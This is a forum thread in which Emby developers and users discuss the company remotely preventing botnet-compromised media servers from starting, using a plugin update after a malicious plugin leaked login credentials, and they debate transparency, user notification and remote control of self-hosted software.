Jump to content

FULL DISCLOSURE: Data Collection in the Process of BotNet Takedown


softworkz

Recommended Posts

16 minutes ago, jl5437 said:

So... you guys have the ability to remotely disable your software eh? Was this only for paid Premium members servers or for everyone's? Even for those that were not open to the internet?

We didn't disable it. We prevented it from starting to make sure that affected users understand what happened and what they need to do: remove the malware,  carefully analyze and check, change passwords etc.

20 minutes ago, jl5437 said:

Well, this is frustrating, but not surprising these days. Seen many a product or service rendered a brick/useless with the normal software or OTA update process, thanks to the company/service shutting down or changing business models.

Why is this frustrating? Should we have left the infected servers running for however long as the admin might never notice or look on the dashboard and hope that the user gets attention before something worse happens?
Those systems we have shutdown were COMPROMISED, INFECTED, HIJACKED by a VIRUS or TROJAN or BACKDOOR however you want to call it.

And then you find it "frustrating" that we shut them down?

25 minutes ago, jl5437 said:

However, good intentions and necessity aside, I do not like that this was possible for the devs to do. 

None of us liked to do this, I can tell you that.

But when you install software from a 3rd party, there's always a certain amount of trust required. Because it doesn't make a difference whether it gets auto-installed or you do it manually: In both cases, you can't  "see" what's inside the update you are installing.

It was a tough decision. Details and reasons will be explained, then you might understand a bit better why we did what we did.

  • Like 5
  • Facepalm 1
  • Agree 2
Link to comment
Share on other sites

andrewds

@softworkz  @AbobaderI think more important is not so much the why but the how. Several people have asked several different ways how these servers were shut down and the question has been consistently dodged. I've seen references to an update, but no update was installed immediately prior to the shutdowns happening. @softworkzmentioned that the check was done on startup. Was some DRM feature highjacked to run arbitrary code as defined by the Emby team? I.E. does the software have the ability to check in with a service being operated by The Company at startup and consume and execute some payload as a response? Alternatively, was there an update delivered to the servers silently? I don't allow my server to auto-restart after installing updates because I like to review the change logs. I don't see anything in the change logs about an update pertaining to this.

How was it accomplished?

  • Like 3
Link to comment
Share on other sites

Ronstang

@softworkzWhile I can't find any evidence on either of my two servers that this actually affected me in any way I will say that if I went to use one and it had been shut down by the emby team although it would have been frustrating and annoying until I understood what was going on I will say that I fully support the actions you took and would have if it HAD inconvenienced me.

Emby is now a part of my life.  I use it every day, I add stuff to it every day and as such I cannot imagine life without it so I thank you for protecting us and the community as a whole.  There are a bunch of great and helpful people here.  I'm sure a few will complain but something tells me the majority is aware of the potential of no action being taken.  You have my permission to get such info from any of my servers.

Thanks for keeping emby the best out there. 👍

  • Like 6
  • Agree 2
Link to comment
Share on other sites

jl5437
40 minutes ago, softworkz said:

We didn't disable it. We prevented it from starting

That is disabled...ie. it don't work, "disabled" it from starting. The software no longer worked , UNTIL the user did something about it. Please don't argue semantics.   

imo, you should have given the user the notice of the issue first, informing them of your intent to take this action in a short period of time, giving them the option to address the issue themselves.

Instead, (it appears) you took action first, and then informed the users later.  (I never got and still have not gotten, any email in regards to this issue. And this happened 4 days ago? I guess you only sent out notices to affected users, and not all users, but what about the users who are not open to the internet, or may still be infected, have not updated their server, that u can not detect? Consider this scenario, and based on other posts here, these questions of more on the how you did this, are being deflected or ignored)  

For a stance of Privacy first, and a this being a user hosted style software, taking the control out of the users hand, is what is my mild annoyance and point of contention is.

Ultimately, It is the USERS responsibility to protect their local machines against malware, not be stupid, and install random plugins or software, and to practice good security practices.

You did what you thought best, ok. I accepted that.  But these actions and reasoning make me question what you can do if any future events happen.

Just expressing my view and feedback on this event.  Not trying to start war over it.  

Edited by jl5437
Link to comment
Share on other sites

jl5437
6 minutes ago, andrewds said:

@softworkz  @AbobaderI think more important is not so much the why but the how. Several people have asked several different ways how these servers were shut down and the question has been consistently dodged. I've seen references to an update, but no update was installed immediately prior to the shutdowns happening. @softworkzmentioned that the check was done on startup. Was some DRM feature highjacked to run arbitrary code as defined by the Emby team? I.E. does the software have the ability to check in with a service being operated by The Company at startup and consume and execute some payload as a response? Alternatively, was there an update delivered to the servers silently? I don't allow my server to auto-restart after installing updates because I like to review the change logs. I don't see anything in the change logs about an update pertaining to this.

How was it accomplished?

Yea. I get WHY. Am ok with it, for the most part. But my issue is, they pushed the disable update first? BEFORE notifying users of the issue and that it was going to happen? Thus, I am sure many users wasted time, to trouble shoot things to get it working again, before coming here or contacting support and learning the why it was not working.  I doubt Emby will share much into the details, as to not give the idea of exploiting it to others. 

Link to comment
Share on other sites

andrewds
Just now, jl5437 said:

Yea. I get WHY. Am ok with it, for the most part. But my issue is, they pushed the disable update first? BEFORE notifying users of the issue and that it was going to happen? Thus, I am sure many users wasted time, to trouble shoot things to get it working again, before coming here or contacting support and learning the why it was not working.  I doubt Emby will share much into the details, as to not give the idea of exploiting it to others. 

But there is no evidence of an update that was pushed first. That leaves 3 options:

1) The functionality to detect this exploit and disable servers upon detection was already in place. The earliest that could have happened per the changelog for the Release branch is December 15, 2022. Then, when the exploit was detected as active on servers in the wild the logic activated and servers were disabled. This seems unlikely given a. it's not in the change log and b. the timeline of events suggests they became acutely aware of active exploitation only within the past couple of weeks.

2) The functionality to detect this exploit and disable servers upon detection was implemented silently, outside of the normal update channel, without notification to administrators.

3) The functionality to execute arbitrary code as defined by the Emby team has been in place for a length of time, the servers check in with a remote service on startup, and this functionality was delivered at startup as a payload returned by that remote service.

Personally I am partial towards the 3rd possibility. I understand the need for commercial DRM but abuse of such a service in this context would be concerning at the least, especially for users for whom there are no paid license terms to be enforced.

I also do think the community is owed an answer on this question.

  • Agree 1
Link to comment
Share on other sites

jl5437

From the security bulletin "Analysis of the plug-in has revealed that it is forwarding the private Emby Server login credentials including the password for every successful login to an external server under control of the hackers"

Ok. So, a users login credentials are stored not encrypted?    If they were, then so what if they got a hold of them. Unless this plugin was logging key strokes from the users input device, but if that so, the local Anti-virus should have been triggered no?  More info on the exact plugins and malware you discovered would be great. I am not seeing any detailed info in that bulletin. 

Link to comment
Share on other sites

andrewds
Just now, jl5437 said:

More info on the exact plugins and malware you discovered would be great. I am not seeing any detailed info in that bulletin.

They've promised us a detailed explanation. Presumably extensive internal analysis and legal/managerial review is underway. These things do take some time fwiw.

  • Agree 1
Link to comment
Share on other sites

jl5437
4 minutes ago, andrewds said:

But there is no evidence of an update that was pushed first. That leaves 3 options:

1) The functionality to detect this exploit and disable servers upon detection was already in place. The earliest that could have happened per the changelog for the Release branch is December 15, 2022. Then, when the exploit was detected as active on servers in the wild the logic activated and servers were disabled. This seems unlikely given a. it's not in the change log and b. the timeline of events suggests they became acutely aware of active exploitation only within the past couple of weeks.

2) The functionality to detect this exploit and disable servers upon detection was implemented silently, outside of the normal update channel, without notification to administrators.

3) The functionality to execute arbitrary code as defined by the Emby team has been in place for a length of time, the servers check in with a remote service on startup, and this functionality was delivered at startup as a payload returned by that remote service.

Personally I am partial towards the 3rd possibility. I understand the need for commercial DRM but abuse of such a service in this context would be concerning at the least, especially for users for whom there are no paid license terms to be enforced.

I also do think the community is owed an answer on this question.

Interesting, I only had a chance to read a few posts on page 1,  just starting to read through the pages, now 8 of them. Did not know all those details you mention. Clearly this event more extensive a thing that i realized. 

Link to comment
Share on other sites

8 minutes ago, jl5437 said:

Instead, (it appears) you took action first, and then informed the users later.

Yes, it had to be like that. This wasn't a virus which acts autonomously. It was a backdoor to turn Emby Servers into BotNet nodes. In case of a BotNet, there are people sitting at the other end, having lists of their active nodes in front of them and the ability to quickly execute arbitrary scripts or binaries which can be transmitted and this needs to be setup just once and then it can be assigned to an arbitrary number of nodes for execution.

Of course, those hackers are monitoring the forums and seeing the same things like you and me. If we had made the updates we provided to execute on arrival, then they would have seen "their" nodes disappearing slowly one after another (within 24h). They could and would have taken measures, like blocking our actions from getting deliverer, or installing additional backdoors  - whatever is needed in order not to lose "their" servers. The same applies if we would have informed users: they would have noted it and taken measures, and the whole thing would have ended really badly for a large number of Emby users. We only had a single chance to save (almost) all Emby servers. It had to happen in a way that they don't see it coming. All happened within 60 seconds only. There was no other way to get all these servers saved.

There will be a document with more details in a while. 

  • Like 1
  • Thanks 2
Link to comment
Share on other sites

Regarding the other question: it was a plugin update. Said it elsewhere before.

Link to comment
Share on other sites

jl5437
1 minute ago, softworkz said:

Yes, it had to be like that. This wasn't a virus which acts autonomously. It was a backdoor to turn Emby Servers into BotNet nodes. In case of a BotNet, there are people sitting at the other end, having lists of their active nodes in front of them and the ability to quickly execute arbitrary scripts or binaries which can be transmitted and this needs to be setup just once and then it can be assigned to an arbitrary number of nodes for execution.

Of course, those hackers are monitoring the forums and seeing the same things like you and me. If we had made the updates we provided to execute on arrival, then they would have seen "their" nodes disappearing slowly one after another (within 24h). They could and would have taken measures, like blocking our actions from getting deliverer, or installing additional backdoors  - whatever is needed in order not to lose "their" servers. The same applies if we would have informed users: they would have noted it and taken measures, and the whole thing would have ended really badly for a large number of Emby users. We only had a single chance to save (almost) all Emby servers. It had to happen in a way that they don't see it coming. All happened within 60 seconds only. There was no other way to get all these servers saved.

There will be a document with more details in a while. 

mmm. ok. 

Though, again, as others have mentioned, how this happened, users credentials got compromised (not encrypted?), the malicious plugins installed without their consent, the "default" or unsafe settings that were not changed by the end user that lead to them being vulnerable...need to be addressed and the sever updated to make sure the user changes those settings. Hope your doc addresses this.

Link to comment
Share on other sites

Ronstang

I was out of town when this happened and my wife understands bupkis about this so if this exploit had happened to me I would have been helpless to do anything about it even if I was made aware.  I for one am grateful the emby team took action.  I am not savvy enough on this stuff to fully understand what could have happened but I have over 60TB of what amounts to a  lot of work online at the moment, some hard to replace,  and if I could have lost any of it then that is far worse than the emby team executing an action without my knowledge to protect me from such loss.

Thanks again guys.

  • Like 2
Link to comment
Share on other sites

10 minutes ago, andrewds said:
13 minutes ago, jl5437 said:

More info on the exact plugins and malware you discovered would be great. I am not seeing any detailed info in that bulletin.

They've promised us a detailed explanation. Presumably extensive internal analysis and legal/managerial review is underway. These things do take some time fwiw.

Exactly. Please bear with us. It's weekend.

  • Like 1
  • Agree 1
Link to comment
Share on other sites

andrewds
8 minutes ago, softworkz said:

Regarding the other question: it was a plugin update. Said it elsewhere before.

A plugin visible under installed plugins? One that an administrator could remove if they wished? The only one it could be for me, that is visible to me, is MovieDB.

  • Agree 1
Link to comment
Share on other sites

jl5437
On 5/26/2023 at 12:13 PM, Mikele said:

 

 

SUGGESTIONS:

While I appreciate this post with the details you have provided I would do some stuff differently next time.

  • Give the severity of this I would have sent an email warning your users (all of them). I was able to find out about this by pure luck by reading the news.
  • The informations about actions to take to check if someone got hacked or actions to take to resolve the issue are NOT very clear (at least to me) and scattered among various thread in the forum. Would be nice to have detailed information on which exact file/DNS record to check (Name, hashes, version, etc.). Remember who reads the advisory has no background information/clue about what you are talking. I can see a lot of users here are not tech savy so a FAQ included in the advisory would come in handy. (Example: Windows user....check the following path, linux users...check this other path).
  • Timeline: When do you first discovered about the issue? How did you discovered it?  If someone got hacked we want to check every log not only the last one. Having a timeline greatly reduces efforts needed by administrators to properly check their systems and take remedial action.
  • Why the proxy variable vulnerability reported in 2020 was NOT fixed earlier?? Despite the misconfig some of us might have, this was key for a successful exploitation. I also discovered about this vulnerability just because of what happened. If you can't fix something for whatever reason just warn your user so we know and we as user/server owners can decide on the action to take.

 

Thanks for taking the time to read my post. Hopefully this is not interpreted as criticism rather as a suggestion by a concerned user for the future in hope something like this will never happen again.

See this reply.

 

Link to comment
Share on other sites

8 minutes ago, softworkz said:

Regarding the other question: it was a plugin update. Said it elsewhere before.

What I can also tell is that there have never been preparations or strategies regarding the use of plugin updates in that way.
It was essentially a spontaneous idea to do it like that.

Link to comment
Share on other sites

jl5437
On 5/26/2023 at 2:18 PM, Ikario said:

People do not usually enter the forum, most people doesn't even know it exists.

Full disclosure to everyone possible is always the best approach, because there are people affected that might not realize they are affected. Yes, I get that you don't have the email of everyone that ever downloaded Emby, but doing a reasonable attempt to inform registered customers is the lowest bar possible and you have not cleared it.

And yes, you will be innundated, thats on you because you had three years to patch this. You did not take down a botnet, you took down the part of the botnet that you had access to, but there's probably lots of compromised systems out there that have no idea what's going on. 

 

If you are trying to argue that informing less people of your security issues is better than more people, then I think your approach to security is severely out of date. 

Ditto.

They replied to my post with more of their reasoning. 

 

Link to comment
Share on other sites

jl5437
On 5/26/2023 at 3:04 PM, Painkiller8818 said:

Maybe this will help getting more security now like the for years open request for 2FA/MFA instead of getting all time the same answer "good idea for the future, thanks"

YEA....I been trying out (the competitor), and while it is less a self hosted thing, with a SSO style thing, at least it has 2FA protection.

Though, users need to be more aware of the huge issue with opening up their media server to the internet. There are for more secure ways to do it than the built in options or simple prt forward. Secure VPN and device ACL whitelist for one.

Link to comment
Share on other sites

6 minutes ago, andrewds said:

Via which plugin? Looking through change logs on those I only see compatibility updates recently, but to be honest I'm not familiar with what all plugins Emby directly controls. I'm educating myself now.

You got the right one already.

  • Thanks 1
Link to comment
Share on other sites

andrewds
4 minutes ago, softworkz said:

You got the right one already.

So this wasn't some behind the scenes thing only the Emby team could have accomplished, it's something that could have arguably been done by any plugin maintainer. That does give me pause, and is arguably abusive, but I suppose it's less overtly nefarious than other options.

Link to comment
Share on other sites

Guest EmbyEbookReader

Hi, I posted earlier but no reply.  I am running Emby Server on a QNAP NAS in my kitchen, connected to LOCAL LAN only with NO PUBLIC INTERNET connection.  Am I a smart admin for this reason?  Am I considered safe from these scum, trash garbage lowlife mofo hackers who are constantly trying to pwn other people’s computers?  Do I need to install Emby BETA Server to get the fix, or should I wait until an official release is released?   Thank you. 

Edited by EmbyEbookReader
Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
×
×
  • Create New...